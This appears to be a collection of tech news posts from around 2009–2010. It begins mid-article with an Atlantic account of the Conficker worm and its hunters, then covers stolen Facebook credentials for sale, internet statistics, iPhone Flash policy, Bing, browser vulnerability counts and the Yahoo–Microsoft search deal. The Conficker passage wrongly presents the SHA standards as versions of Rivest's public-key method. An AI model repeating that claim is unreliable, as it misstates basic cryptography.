There were other improvements to Conficker. Among them: besides shutting down whatever security system was installed on the computer it invaded, and preventing it from communicating with computer-security Web sites, it stopped the computer from connecting with Microsoft to perform Windows updates. So even though Microsoft was providing patches, the infected machines could not get to them. In addition, it modified the computer’s bandwidth settings to increase speed and propagate itself faster; and it began to spread itself in different ways, including via USB drives. This last innovation meant that even “closed” computer networks, those with no connection to the Internet, were vulnerable, since users who cannot readily transmit files from point to point via the Web often store and transport them on small USB drives. If one of those USB drives, or a CD, was plugged into an infected computer, it could deliver the worm to an entire closed network.

All of this was impressive—but something else stopped researchers cold. Analysts with Conficker B isolated in their sandboxes could watch it regularly call home and receive a return message. The exchange was in code, and not just any code.

Breaking codes used to be the province of clever puzzle masters, who during World War II devised encryption and code-breaking methods so difficult that operators needed machines to do the work. Computers today can perform so many calculations so fast that, theoretically at least, no cipher is too difficult to crack. One simply applies what computer scientists call “brute force”: trying every possible combination systematically until the secret is revealed. The game is to make a cipher so difficult that the amount of computing power needed to break it renders the effort pointless—the “thief” would have to spend more to obtain the prize than the prize is worth. In his 1999 history of code-making and -breaking, The Code Book, Simon Singh wrote: “It is now routine to encrypt a message [so securely] that all the computers on the planet would need longer than the age of the universe to break the cipher.”

The basis for the highest-level modern ciphers is a public-key encryption method invented in 1977 by three researchers at MIT: Ron Rivest (the primary author), Adi Shamir, and Leonard Adleman. In the more than 30 years since it was devised, the method has been improved several times. The National Institute of Standards and Technology sets the Federal Information Processing Standard, which defines the cryptography algorithms that government agencies must use to protect communications. Because it is the most sophisticated oversight effort of its kind, the standard is determined by an international competition among the world’s top cryptologists, with the winning entry becoming by default the worldwide standard. The current highest-level standard is labeled SHA-2 (Secure Hash Algorithm–2). Both this and the first SHA standard are versions of Rivest’s method. The international competition to upgrade SHA-2 has been under way for several years and is tentatively scheduled to conclude in 2013, at which point the new standard will become SHA-3.

Rivest’s proposal for the new standard, MD-6 (Message Digest–6), was submitted in the fall of 2008, about a month before Conficker first appeared, and began undergoing rigorous peer review—the very small community of high-level cryptographers worldwide began testing it for flaws.

Needless to say, this is a very arcane game. The entries are comprehensible to very few people. According to Rodney Joffe, “Unless you’re a subject-matter expert actively involved in crypto-algorithms, you didn’t even know that MD-6 existed. It wasn’t like it was put in The New York Times.”

So when the new version of Conficker appeared, and its new method of encrypting its communication employed MD-6, Rivest’s proposal for SHA-3, the cabal’s collective mind was blown.

“It was clear that these guys were not your average high-school kids or hackers or predominantly lazy,” Joffe told me. “They were making use of some very, very sophisticated techniques.

“Not only are we not dealing with amateurs, we are possibly dealing with people who are superior to all of our skills in crypto,” he said. “If there’s a surgeon out there who’s the world’s foremost expert on treating retinitis pigmentosa, he doesn’t do bunions. The guy who is the world expert on bunions—and, let’s say, bunions on the third digit of Anglo-American males between the ages of 35 and 40, that are different than anything else—he doesn’t do surgery for retinitis pigmentosa. The knowledge it took to employ Rivest’s proposal for SHA-3 demonstrated a similarly high level of specialization. We found an equivalent of three or four of those in the code—different parts of it.

“Take Windows,” he explained. “The understanding of Windows’ operating system, and how it worked in the kernel, needed that kind of a domain expert, and they had that kind of ability there. And we realized as a community that we were not dealing with something normal. We’re dealing with one of two things: either we’re dealing with incredibly sophisticated cyber criminals, or we’re dealing with a group that was funded by a nation-state. Because this wasn’t the kind of team that you could just assemble by getting your five buddies who play Xbox 360 and saying, ‘Let’s all work together and see what we can do.’”

The plot thickened—it turned out that Rivest’s proposal, MD-6, had a flaw. Cryptologists in the competition had duly gone to work trying to crack the code, and one had succeeded. In early 2009, Rivest quietly withdrew his proposal, corrected it, and resubmitted it. This gave the cabal an opening. If the original Rivest proposal was flawed, then so was the encryption method for Conficker B. If they were able to eavesdrop on communications between Conficker and its mysterious controller, they might be able to figure out who he was, or who they were. How likely was it that the creator of Conficker would know about the flaw discovered in MD-6?

Once again, the good guys had the bad guys in check.

About six weeks later, another new version of the worm appeared.

It employed Rivest’s revised MD-6 proposal.

Game on.

“Our Finest Hour”

By early 2009, Conficker B had infected millions of machines. It had invaded the United Kingdom’s Defense Ministry. As CBS prepared a 60 Minutes segment on the worm, its computers were struck. In both instances, security experts scrambled to uproot the invader, badly disrupting normal functioning of the system. Conficker now had the world’s attention. In February 2009, the cabal became more formal. Headed initially by a Microsoft program manager, and eventually by Joffe, it became the Conficker Working Group. Microsoft offered a $250,000 bounty for the arrest and conviction of the worm’s creators.

The newly named team went to work trying to corral Conficker B. Getting rid of it was out of the question. Even though they could scrub it from an infected computer, there was no way they could scrub it from all infected computers. The millions of machines in the botnet were spread all over the world, and most users of infected ones didn’t even know it. It was theoretically feasible to unleash a counter-worm, something to surreptitiously enter computers and take out Conficker, but in free countries, privacy laws frown on invading people’s home computers. Even if all the governments got together to allow a massive attack on Conficker—an unlikely event—the new version of the worm had new ways of evading the threat.

Conficker C appeared in March 2009, and in addition to being impressed by its very snazzy crypto, the Conficker Working Group noticed that the new worm’s code threatened to up the number of domain names generated every day to 50,000. The new version would begin generating that many domain names daily on April 1. At the same time, all computers infected with the old variants of Conficker that could be reached would be updated with this new strain. The move suggested that the bad guys behind Conficker understood not just cryptology, but also the mostly volunteer nature of the cabal.

“You know you’re dealing with someone who not only knows how botnets work, but who understands how the security community works,” Andre’ DiMino told me. “This is not just a bunch of organized criminals that, say, commission someone to write a botnet for them. They know the challenges that the security community faces internally, politically, and economically, and are exploiting them as well.”

The bad guys knew, for instance, that preregistering even 250 domain names a day at $10 a pop was doable for the good guys. As long as the number remained relatively small, the cabal could stay ahead of them. But how could the good guys cope with a daily flood of 50,000? It would require an unprecedented degree of cooperation among competing security firms, software manufacturers, nonprofit organizations like Shadowserver, academics, and law enforcement.

“You can’t just register all 50,000—you’ve got to go one by one and make sure the domain name doesn’t already exist,” Joffe says. “And if it exists, you’ve got to make sure that it belongs to a good guy, not a bad guy. You’ve got to make a damn phone call for any of the new ones, and have to send someone out there to do it—and these are spread all over the world, including some very remote places, Third World countries. Now the bar had been raised to a level that was almost insurmountable.”

The worm was already running rings around the good guys, and then, just for good measure, it planted a pie in their faces on, of all days, April 1. By playing with the new variant in their sandboxes, the cabal knew that the enhanced domain-name-generating algorithm would click in on that day. If the update succeeded, it would be a game-changer. It was the most dramatic moment since Conficker had surfaced the previous November. Apparently, at long last, this extraordinary tool was going to be put to use. But for what? The potential was scary. Few people outside the upper echelon of computer security even understood what Conficker was, much less what was at stake on April 1, but word of a vague impending digital doomsday spread. The popular press got hold of it. There were headlines and the usual spate of ill-informed reports on cable TV and the Internet. When the day arrived, those who had been warning about the dangers of this new worm were sure to see their fears vindicated.

The cabal mounted a heroic effort to shut down the worm’s potential command centers in advance of the update, coordinating directly with the Internet Corporation for Assigned Names and Numbers, the organization that supervises registries worldwide. “It was our finest hour,” Joffe says.

“I don’t think that the bad guys could have expected the research community to come together as it did, because it was pretty unprecedented,” Ramses Martinez, director of information security for VeriSign, told me. “That was a new thing that happened. I mean, if you would have told me everybody’s going to come together—by everybody, I mean all these guys in this computer-security world that know each other—and they’re going to do this thing, I would have said, ‘You’re crazy.’ I don’t think the bad guys could have expected that.”

Much of the computer world was watching, in considerable suspense, to see what would happen on April 1. It was like the moment in a movie when the bad guy at last has cornered the hero. He pulls out an enormous gun and aims it at the hero’s head, pulls the trigger … and out pops a little flag with the word BANG!

Conficker found one or two domain names that Joffe’s group had missed, which was all it needed. The cabal’s efforts had succeeded in vastly reducing the number of machines that got the update, but the ones that did went to work distributing a very conventional, well-known malware called Waledac, which sends out e-mail spam selling a fake anti-spyware program. The worm was used to distribute Waledac for two weeks, and then stopped.

But something much more important had happened. The updated worm didn’t just up the ante by generating 50,000 domain names daily; it effectively moved the game out of the cabal’s reach.

“April 1 came and went, and in the middle of that night the systems switched over to the new algorithm,” Conficker C, Joffe told me. “That’s all that was supposed to happen, and it happened. But the Internet didn’t get infected; it was just an algorithm change in the software. So of course the press said, ‘Conficker is a bust.’”

Public concern over the worm fizzled, just as the problem grew worse: the new version of Conficker introduced peer-to-peer communications, which was disheartening to the good guys, to say the least. Peer-to-peer operations meant the worm no longer had to sneak in through Windows Port 445 or a USB drive; an infected computer spread the worm directly to every machine it interacted with. It also meant that Conficker no longer needed to call out to a command center for instructions; they could be distributed directly, computer to computer. And since the worm no longer needed to call home, there was no longer any way to tell how many computers were infected.

In the great chess match, the worm had just pronounced “Checkmate.”

Watching and Waiting

As of this writing, 17 months after it appeared and about a year after the April 1 update, Conficker has created a stable botnet. It consists of anywhere from hundreds of thousands of computers to 12 million. No one knows for sure anymore, because with peer-to-peer communications, the worm no longer needs to check in with an outside command center, which is how the good guys kept count. Joffe estimates that with the four distinct strains (yet another one appeared on April 8, 2009), 6.5 million computers are probably infected.

The investigators see no immediate chance or even any effective way to kill it.

“There are a bunch of infected machines that are out there, and they can be taken over, given the right circumstances, by the bad guys,” VeriSign’s Martinez says. “Will they do that? I don’t know. So it’s a potential threat. It’s something that’s out there, sitting there, and it needs to be addressed, but I don’t think, honestly, that we know how. How do we address this? If it was sitting in the U.S., it would be a fairly easy thing to do. The fact is that it’s spread out all around the world.”

Ever since the paltry Waledac scam, the worm has been biding its time.

“They are watching us watch them,” says Andre’ DiMino, the botnet hunter. “I think it’s really either that or somebody let this thing get bigger, and it’s advanced bigger and further than they ever dreamed possible. A lot of people think that. But in looking at the sophistication of this thing and looking at the evolution of this thing, I think they knew exactly what they were doing. I think they were trying something, and I think that they’re too smart to do what everybody figured they were going to do. You have to remember, the world was watching this thing and waiting for the world to end from Conficker on April 1, 2009. The last thing you’d want to do if you’re the bad guy is make something happen on April 1. You’re never going to do that, because everybody’s watching it. You’re going to do something when you’re least suspected. So these guys are sophisticated. They have good code. And just even seeing the evolution from Conficker A to B to C, where there’s the peer-to-peer component, which … strikes fear into the heart of botnet hunters because it’s just so damn difficult to track—these guys know exactly what they’re doing.”

So who are they?

One of the things Martinez’s team does, patrolling the perimeter at VeriSign looking for threats, is dip into the obscure digital forums where cyber criminals converse. Those who are engaged in writing sophisticated malware boast and threaten and compare notes. The good guys venture in to collect intelligence, or just out of curiosity, or for fun. They sometimes pretend to be malware creators themselves, sometimes not. Sometimes they engage in a little cyber trash talk.

“In the past you were just sort of making sure they didn’t steal your proprietary information,” Martinez says. “Now we go in to engage them. You talk to them and you exchange information. You have a guy in Russia selling malware, working with a guy in Mexico doing phishing attacks, who’s talking to a kid in Brazil, who’s doing credit-card fraud, and they’re introducing each other to some guy in China doing something else.”

Martinez said he recently eavesdropped on a dialogue between a security researcher and a man he suspects was at least partly responsible for Conficker. He wouldn’t say how he drew that connection, only that he had good reasons for believing it to be true. The suspect in the conversation was eastern European. The standard image of a malware creator is the Hollywood one: a brilliant 20-something with long hair and a bad attitude, in need of a bath. This is not how Martinez sees his nemesis—or nemeses.

“I see him, or them, as a really well-educated, smart businessman,” he said. “He may be 50 years old. These guys are not chumps. They’re not just out to make a buck.”

The eastern European, backpedaling from further dialogue with the security geek, wrote, “You’re the good guys; we’re the bad guys. Bacillus can’t live with antibodies.”

“Now, I didn’t grow up in a bad neighborhood or anything,” said Martinez, “but the few thugs that I saw would never use a word like bacillus or make an analogy like that.”

One of the early clues in the hunt was the peculiarity in the Conficker code that made computers with active Ukrainian keyboards immune. Much of the world’s aggressive malware comes from eastern Europe, where there are high levels of education and technical expertise, and also thriving organized criminal gangs. Martinez believes Conficker was written by a group of highly skilled programmers. Like Joffe, he sees it as a group of creators, because designing the worm required expertise in so many different disciplines. He suspects that these skilled programmers and technicians either were hired by a criminal gang, or created the worm as their own illicit business venture. If that’s true, then the Waledac maneuver was like flexing Conficker’s pinkie—just a demonstration, a way of showing that despite the best and most concerted effort of the world’s computer-security establishment, the worm was fully operational and under their control.

Will they be caught?

“I have no idea,” Martinez says. “I would say probably not. I’ll be shocked if they’re ever arrested. And arrest them for what? Is breaking into people’s computers even illegal where they’re from? Because in a lot of countries, it isn’t. As a matter of fact, in some countries, unless you’re touching a computer in their jurisdiction, their country, that’s not illegal. So who’s going to arrest them, even if we know who they are?”

Ridding computers of the worm poses another kind of overwhelming problem.

“There are controls, or checks and balances, in place to limit what police can do, because we have civil liberties to protect,” he says. “If you do away with these checks and balances, where the government can come in and reimage your computer overnight, now you’re infringing on people’s civil liberties. So, I mean, we can talk about this all day, but I’ll tell you, it’s going to be a long time, in my opinion, before we really see the government being able to effectively deal with cyber crime, because I think we’re still learning as a culture, as a nation, and as a world how to deal with this stuff. It’s too new.”

Imagining Conficker’s creators as a skilled group of illicit cyber entrepreneurs remains the prevailing theory. Some of the good guys feel that the worm will never be used again. They argue that it has become too notorious, too visible, to be useful. Its creators have learned how to whip computer-security systems worldwide, and will now use that knowledge to craft an even stealthier worm, and perhaps sell it to the highest bidder. Few believe Conficker itself is the work of any one nation, because other than the initial quirk of the Ukrainian-keyboard exemption, it spreads indiscriminately. China is the nation most often suspected in cyber attacks, but there may be more Conficker-infected computers in China than anywhere else. Besides, a nation seeking to create a botnet weapon is unlikely to create one as brazen as Conficker, which from the start has exhibited a thumb-in-your-eye, catch-me-if-you-can personality. It is hard to imagine Conficker’s creators not enjoying the high level of cyber gamesmanship. The good guys certainly have.

“It’s cops and robbers, so to speak, and that was a really interesting aspect of the work for me,” says Martinez. “It’s guys trying to outwit each other and exploit vulnerabilities in this vast network. “

In chess, when your opponent checkmates you, you have no recourse. You concede and shake the victor’s hand. In the real-world chess match over Conficker, the good guys have another recourse. They can, in effect, upend the board and go after the bad guys physically. Which is where things stand. The hunt for the mastermind (or masterminds) behind the worm is ongoing.

“It’s an active investigation,” Joffe says. “That’s all I can say. Law enforcement is fully engaged. We have some leads. This story is not over.”

This article available online at: http://www.theatlantic.com/magazine/archive/2010/06/the-enemy-within/8098/

A hacker named Kirllos has a rare deal for anyone who wants to spam, steal or scam on Facebook: an unprecedented number of user accounts offered at rock-bottom prices.

Researchers at VeriSign's iDefense group recently spotted Kirllos selling Facebook user names and passwords in an underground hacker forum, but what really caught their attention was the volume of credentials he had for sale: 1.5 million accounts.

IDefense doesn't know if Kirllos' accounts are legitimate, and Facebook didn't respond to messages Thursday seeking comment. If they are legitimate, he has the account information of about one in every 300 Facebook users. His asking price varies from US$25 to $45 per 1,000 accounts, depending on the number of contacts each user has.

To date, Kirllos seems to have sold close to 700,000 accounts, according to VeriSign Director of Cyber Intelligence Rick Howard.

Hackers have been selling stolen social-networking credentials for a while -- VeriSign has seen a brisk trade in names and passwords for Russia's VKontakte, for example. But now the trend is to go after global targets such as Facebook, Howard said.

Facebook has more than 400 million users worldwide, many of whom fall victim to scams each day. In one such scam, criminals send out messages from a compromised account, telling friends that the account's owner is trapped in a foreign country and needs money to get home.

In another, they send Web links that lead to malicious software, telling friends that it's a hilarious or sensationalistic video.

"People will follow it because they believe it was a friend that told them to go to this link," said Randy Abrams, director of technical education with security vendor Eset. Once the malware gets installed, criminals can steal more passwords, break into bank accounts, or simply use the computers to send spam or launch distributed denial of service attacks. "There's just a plethora of things that people can do if they can trick people into installing their software," he said.

Kirllos' Facebook prices are extremely cheap compared to what others are charging. In its most recent Internet Security Threat Report, Symantec found that e-mail usernames and passwords typically went for between $1 to $20 per account -- Kirllos wants as little as $0.025 per Facebook account. More coveted credit card or bank account details can go for much more, ranging between $0.85 to $30 for credit card numbers to $15 to $850 for top-quality online bank accounts.

[via www.pcworld.com]

Hacker bietet 1,5 Millionen Facebook-Konten zum Verkauf

"Kirllos" bietet rund 1,5 Millionen Facebook-Zugangsdaten im Netz zum Verkauf an. Dabei sind die Preise überraschend billig: Für 1000 Konten fordert er zwischen 25 und 45 Dollar. 700.000 Accounts soll Kirllos bereits verscherbelt haben. Ein Ende ist nicht in Sicht.

Schon lange ist es kein Geheimnis mehr, dass soziale Netzwerke wie Facebook und StudiVZ Datenschützern und Verbraucherschützern ein Dorn im Auge sind. Die Skepsis ist nicht unbegründet, denn immer wieder kommt es zu überraschenden Datenlecks, die auf unklare Datenschutzbestimmungen und ein unverantwortliches Verhalten seitens der Nutzer zurückzuführen sind. Auch der neueste Fall lässt zahlreiche Netzaktivisten aufschrecken. Einem Bericht von "PC World" zufolge bietet der russischstämmige Hacker "Kirllos" rund 1,5 Millionen Zugangsdaten des sozialen Netzwerks Facebook zum Verkauf an. Mit Schleuderpreisen versucht der Hacker die Kunden auf seine Seite zu gewinnen. Für Datensätze von 1000 Konten verlangt er nur 25 bis 45 US-Dollar. 700.000 Accounts konnte "Kirllos" auf diese Weise bereits zu Geld machen.

Auf das Angebot des Hackers sei man erstmals in einem bekannten Hacker-Forum aufmerksam geworden. Schnell habe sich die Offerte von "Kirllos" in Kennerkreisen herumgesprochen, da die Preise ungewöhnlich niedrig waren. Während man in der Regel ein bis 20 US-Dollar pro Account einfordere, biete der russischstämmige Hacker die Accounts zu Schnäppchenpreisen an, heißt es. Mit durchschnittlich nicht einmal zwei Cent pro Account sei der Preis in diesem Fall überraschend günstig. Je nachdem, wie viele Freunde die jeweiligen Konten aufzuweisen haben, variiere der Preis der Datensätze. Für die Preisgestaltung sei auch die Aktivität des Nutzers von großer Bedeutung.
Welche Nutzer es getroffen hat, ist noch nicht bekannt. In Anbetracht der Tatsache, dass Facebook derzeit mehr als 400 Millionen Benutzer zählt und der Hacker "Kirllos" im Besitz von 1,5 Millionen Accounts ist, scheint das Ausmaß jedoch überwältigend. Sollten die Angaben stimmen, hätte der Hacker Zugang auf ungefähr jedes 267ste Konto.

[via www.gulli.com]

Email

• 90 trillion – The number of emails sent on the Internet in 2009.
• 247 billion – Average number of email messages per day.
• 1.4 billion – The number of email users worldwide.
• 100 million – New email users since the year before.
• 81% – The percentage of emails that were spam.
• 92% – Peak spam levels late in the year.
• 24% – Increase in spam since last year.
• 200 billion – The number of spam emails per day (assuming 81% are spam).

Websites

• 234 million – The number of websites as of December 2009.
• 47 million – Added websites in 2009.

Web servers

• 13.9% – The growth of Apache websites in 2009.
• -22.1% – The growth of IIS websites in 2009.
• 35.0% – The growth of Google GFE websites in 2009.
• 384.4% – The growth of Nginx websites in 2009.
• -72.4% – The growth of Lighttpd websites in 2009.

Domain names

• 81.8 million – .COM domain names at the end of 2009.
• 12.3 million – .NET domain names at the end of 2009.
• 7.8 million – .ORG domain names at the end of 2009.
• 76.3 million – The number of country code top-level domains (e.g. .CN, .UK, .DE, etc.).
• 187 million – The number of domain names across all top-level domains (October 2009).
• 8% – The increase in domain names since the year before.

Internet users

• 1.73 billion – Internet users worldwide (September 2009).
• 18% – Increase in Internet users since the previous year.
• 738,257,230 – Internet users in Asia.
• 418,029,796 – Internet users in Europe.
• 252,908,000 – Internet users in North America.
• 179,031,479 – Internet users in Latin America / Caribbean.
• 67,371,700 – Internet users in Africa.
• 57,425,046 – Internet users in the Middle East.
• 20,970,490 – Internet users in Oceania / Australia.

Social media

• 126 million – The number of blogs on the Internet (as tracked by BlogPulse).
• 84% – Percent of social network sites with more women than men.
• 27.3 million – Number of tweets on Twitter per day (November, 2009)
• 57% – Percentage of Twitter’s user base located in the United States.
• 4.25 million – People following @aplusk (Ashton Kutcher, Twitter’s most followed user).
• 350 million – People on Facebook.
• 50% – Percentage of Facebook users that log in every day.
• 500,000 – The number of active Facebook applications.

Images

• 4 billion – Photos hosted by Flickr (October 2009).
• 2.5 billion – Photos uploaded each month to Facebook.
• 30 billion – At the current rate, the number of photos uploaded to Facebook per year.

Videos

• 1 billion – The total number of videos YouTube serves in one day.
• 12.2 billion – Videos viewed per month on YouTube in the US (November 2009).
• 924 million – Videos viewed per month on Hulu in the US (November 2009).
• 182 – The number of online videos the average Internet user watches in a month (USA).
• 82% – Percentage of Internet users that view videos online (USA).
• 39.4% – YouTube online video market share (USA).
• 81.9% – Percentage of embedded videos on blogs that are YouTube videos.

Web browsers

Malicious software

• 148,000 – New zombie computers created per day (used in botnets for sending spam, etc.)
• 2.6 million – Amount of malicious code threats at the start of 2009 (viruses, trojans, etc.)
• 921,143 – The number of new malicious code signatures added by Symantec in Q4 2009.

Data sources: Website and web server stats from Netcraft. Domain name stats from Verisign and Webhosting.info. Internet user stats from Internet World Stats. Web browser stats from Net Applications. Email stats from Radicati Group. Spam stats from McAfee. Malware stats from Symantec (and here) and McAfee. Online video stats from Comscore, Sysomos and YouTube. Photo stats from Flickr and Facebook. Social media stats from BlogPulse, Pingdom (here and here), Twittercounter, Facebook and GigaOm.

Don’t hold your breath waiting for the iPhone to support Adobe’s Flash software: Apple’s terms-of-service agreement prohibits it.

Although Adobe says it is working on a version of its popular Flash player for the iPhone, Apple is unlikely ever to permit it to appear in the handset’s App Store, no matter how much customers want it.

“I’m pretty skeptical that Flash could be implemented in a way that doesn’t violate the Terms of Service of the developer’s agreement,” said Bart Decrem, CEO of Tapulous, developer of the popular Tap Tap Revenge iPhone game.

Flash is Adobe’s highly popular platform for displaying interactive graphics, animations and multimedia within a browser. According to Adobe, 98 percent of desktop computers currently support Flash, which has led to its widespread use by web developers. Adobe’s recent announcement that it is working on a version of Flash for Windows Mobile has prompted speculation that an iPhone version might be coming soon. But the speculators may be waiting in vain, based on Apple’s TOS and the company’s history of tightly controlling applications for its smartphone platform.

Allowing Flash — which is a development platform of its own — would just be too dangerous for Apple, a company that enjoys exerting total dominance over its hardware and the software that runs on it. Flash has evolved from being a mere animation player into a multimedia platform capable of running applications of its own. That means Flash would open a new door for application developers to get their software onto the iPhone: Just code them in Flash and put them on a web page. In so doing, Flash would divert business from the App Store, as well as enable publishers to distribute music, videos and movies that could compete with the iTunes Store.

Apple’s well aware of these problems, which is why the company wrote a clause in its iPhone developers’ Terms of Service agreement (.pdf) that prohibits Flash from appearing on the iPhone:

“An Application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise,” reads clause 3.3.2 of the iPhone SDK agreement, which was recently published on WikiLeaks. “No interpreted code may be downloaded and used in an Application except for code that is interpreted and run by Apple’s Published APIs and built-in interpreter(s).”

This could come as major disappointment to iPhone owners, as the lack of Flash support has been a paramount complaint about the handset since its release. No Flash means that the iPhone browser is incapable of displaying a large portion of the internet. For example, free Flash games aren’t supported, videos can’t be streamed from the vastly popular television and movie site Hulu, and websites that use Flash to render content or navigation won’t work on the iPhone.

It’s no wonder Adobe is expressing reluctance about the prospects of Flash for iPhone. The company on Monday demonstrated a version of Flash for Windows
Mobile handsets. And all that product manager Michele Turner could say about iPhone was, “We are working on Flash on the iPhone, but it is really up to Apple.”

Adam Dann, CEO of Nullriver, agrees that Flash would take away some of Apple’s control. Apple eventually banned Nullriver’s application NetShare because it violated AT&T Terms of Service agreement by turning the iPhone into a wireless modem for tethering. If Apple introduced Flash to iPhone, it’s possible Nullriver could code a Flash version of NetShare, repeating that violation, Dann said.

Dann added that the only way Flash could ever appear on the iPhone is if Adobe offered an extremely stripped-down version of the software. But even if there is a “Flash Lite” for iPhone, that just reinforces the point that the handset’s owners still will not have a true Flash experience.

And aside from taking software control away from Apple, Flash would introduce a slew of other potential headaches as well. Flash apps could hurt battery life, suck up the graphics-processing unit’s power, use an inordinate amount of memory, or potentially introduce security risks. Apple has plenty of customer complaints to address about the iPhone; the last thing it needs is to add Adobe and Flash to the pile.

In August, Britain’s Advertising Standards Authority pulled an iPhone advertisement because the commercial said, “All the parts of the internet are on the iPhone.” The lack of Flash and Java support on iPhone were enough for the ad to be deemed misleading. And it’s looking like Apple won’t be able to air that ad again.

Apple did not return phone calls for comment.

[via wired ], [Download Apple iPhone SDK Agreement via wikileaks]

Microsoft announced a broad range of new functionality for Bing, its search engine, on Nov. 11. In addition to incorporating results from Wolfram Alpha, a "computational engine" that provides a definitive numerical answer to a search query, the revamped Bing offers a more robust video page—with feeds from MSN Video, Hulu, and ABC—and more intensive search in categories such as local events and cities.

In a sign of the increased importance of social networking to corporations such as Microsoft and Google, Bing has also incorporated Facebook and Twitter into its search features.

New study places Firefox at the top of vulnerability list for for the first half of 2009:

Application security vendor Cenzic today released its security trends report for the first half of 2009 application. In it, Cenzic claims that the Mozilla's Firefox browser led the field of Web browsers in terms of total vulnerabilities.

According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of all reported browser vulnerability, Microsoft's Internet Explorer was third at 15 percent and Opera had just six percent share.

The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 report, where IE accounted for 43 percent of all reported Web browser vulnerabilities and Firefox followed closely at 39 percent.

As to why Firefox's numbers were so high, Cenzic has a few ideas.

"It's a combination of different things," Lars Ewe, CTO of Cenzic, told InternetNews.com. "They've gotten more traction as a browser, which is good for them and the more you get used the more exposure you have. As well a fair amount of the vulnerabilities have come by way of plug-ins."

One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities is with how the browser handles plug-ins.

"The plug-in architecture that they have is a selling fact for the browser and one of the reasons why I love using it," Ewe said. "They can't control security aspects of all the plug-ins and the vulnerabilities are a side effect of that."

Mozilla has made numerous efforts this year to bolster its plug-in security. Recently they launched a plug-in checker service to ensure that users are running up-to-date versions. The Firefox 3.0.9 update, which came out in April, specifically addressed several key plug-in vulnerabilities.

Though Firefox had the highest number of vulnerabilities, that doesn't necessarily mean that Firefox users were more vulnerable.

Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific differentiation for zero day bugs in the browser vulnerability count either. All that raises the question of how Cenzic actually came up with their vulnerability counts in the first place.

"The process that we follow is looking at a number of different vulnerability databases and sources that we have and trying to come up with a fair percentage based on the deviations we see between the databases," Ewe said. "You could make the argument, that's its 40 percent or 42 percent and there might be some variation on how you analyze it, but certainly it's not off by 20 percent."

While the Cenzic report shows Firefox at the top of the browser vulnerability pile, Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions.

"Full disclosure here, Mozilla plays an important role in Cenzic's solution," Ewe said. "We are actually sitting on top of Mozilla as our agent of preference for scanning sites."

Cenzic develops an application scanning solution that uses the underlying Mozilla browser technology to test out security on Web site insides of a real browser context.

"We have a technology that we refer to as stateful assessment technology," Ewe said. "The idea behind it is to have as faithful an interaction with a Web site as possible and to determine vulnerabilities not on simple signatures but on behavioral basis of the application."

Ewe explained that when you do a cross-site scripting attack with a signature-based approach you'd just look for a server response that would indicate that the script tag has been injected. He added that the problem with that approach is that it's not faithful and the security researcher doesn't know if there is any additional logic on the client side that takes care of the script tag.

"If you want to be really faithful in the process you need to have full rendering capabilities and have all the JavaScript event handling," Ewe said. "So we leverage the entire Firefox architecture in order for us to actually have as faithful an interaction with a server as possible and maintain the client state. That results in low false-positives."

Source: www.internetnews.com

SUNNYVALE, CA and REDMOND, WA — 29 July, 2009 — Yahoo! and Microsoft announced an agreement that will improve the Web search experience for users and advertisers, and deliver sustained innovation to the industry. In simple terms, Microsoft will now power Yahoo! search while Yahoo! will become the exclusive worldwide relationship sales force for both companies' premium search advertisers.

For Web users and advertisers, this deal will accelerate the pace and breadth of innovation by combining both companies' complementary strengths and search platforms into a market competitor with the scale to fuel sustained development in search and search advertising. Users will find what they care about faster and with more personal relevance. Microsoft's competitive search platforms will lead to more value for advertisers, better results for web publishers, and increased innovation and efficiency across the Internet.

Under this agreement, Yahoo! will focus on its core business of providing consumers with great experiences with the world's favorite online destinations and Web products.

"This agreement comes with boatloads of value for Yahoo!, our users, and the industry. And I believe it establishes the foundation for a new era of Internet innovation and development," said Yahoo! CEO Carol Bartz. "Users will continue to experience search as a vital part of their Yahoo! experiences and will enjoy increased innovation thanks to the scale and resources this deal provides. Advertisers will also benefit from scale and enjoy greater ease of use and efficiencies working with a single platform and sales team for premium advertisers. Finally, this deal will help us increase our investments in priority areas in winning audience properties, display advertising capabilities, and mobile experiences."

Providing a viable alternative to advertisers, this deal will combine Yahoo! and Microsoft search marketplaces so that advertisers no longer have to rely on one company that dominates more than 70 percent of all search. With the addition of Yahoo!'s search volume, Microsoft will achieve the size and scale required to unleash competition and innovation in the market, for consumers as well as advertisers.

Microsoft CEO Steve Ballmer said the agreement will provide Microsoft's search engine, Bing, the scale necessary to more effectively compete, attracting more users and advertisers, which in turn will lead to more relevant ads and search results.

"Through this agreement with Yahoo!, we will create more innovation in search, better value for advertisers, and real consumer choice in a market currently dominated by a single company," said Ballmer. "Success in search requires both innovation and scale. With our new Bing search platform, we've created breakthrough innovation and features. This agreement with Yahoo! will provide the scale we need to deliver even more rapid advances in relevancy and usefulness. Microsoft and Yahoo! know there's so much more that search could be. This agreement gives us the scale and resources to create the future of search."

"This deal fits the long-term strategic direction of Yahoo! to remain the world's leading online media company and Carol Bartz has the full and unanimous support of the Yahoo! Board behind this deal," said Roy Bostock, chairman, Yahoo! Inc. "This is a significant opportunity for us. Microsoft is an industry innovator in search, and it is a great opportunity for us to focus our investments in other areas critical to our future."

The key terms of the agreement are as follows:

• The term of the agreement is 10 years;

• Microsoft will acquire an exclusive 10 year license to Yahoo!'s core search technologies, and Microsoft will have the ability to integrate Yahoo! search technologies into its existing web search platforms;

• Microsoft's Bing will be the exclusive algorithmic search and paid search platform for Yahoo! sites. Yahoo! will continue to use its technology and data in other areas of its business such as enhancing display advertising technology.

• Yahoo! will become the exclusive worldwide relationship sales force for both companies' premium search advertisers. Self-serve advertising for both companies will be fulfilled by Microsoft's AdCenter platform, and prices for all search ads will continue to be set by AdCenter's automated auction process.

• Each company will maintain its own separate display advertising business and sales force.

• Yahoo! will innovate and "own" the user experience on Yahoo! properties, including the user experience for search, even though it will be powered by Microsoft technology.

• Microsoft will compensate Yahoo! through a revenue sharing agreement on traffic generated on Yahoo!'s network of both owned and operated (O&O) and affiliate sites.

  • Microsoft will pay traffic acquisition costs (TAC) to Yahoo! at an initial rate of 88% of search revenue generated on Yahoo!'s O&O sites during the first 5 years of the agreement.

  • Yahoo! will continue to syndicate its existing search affiliate partnerships.

• Microsoft will guarantee Yahoo!'s O&O revenue per search (RPS) in each country for the first 18 months following initial implementation in that country.

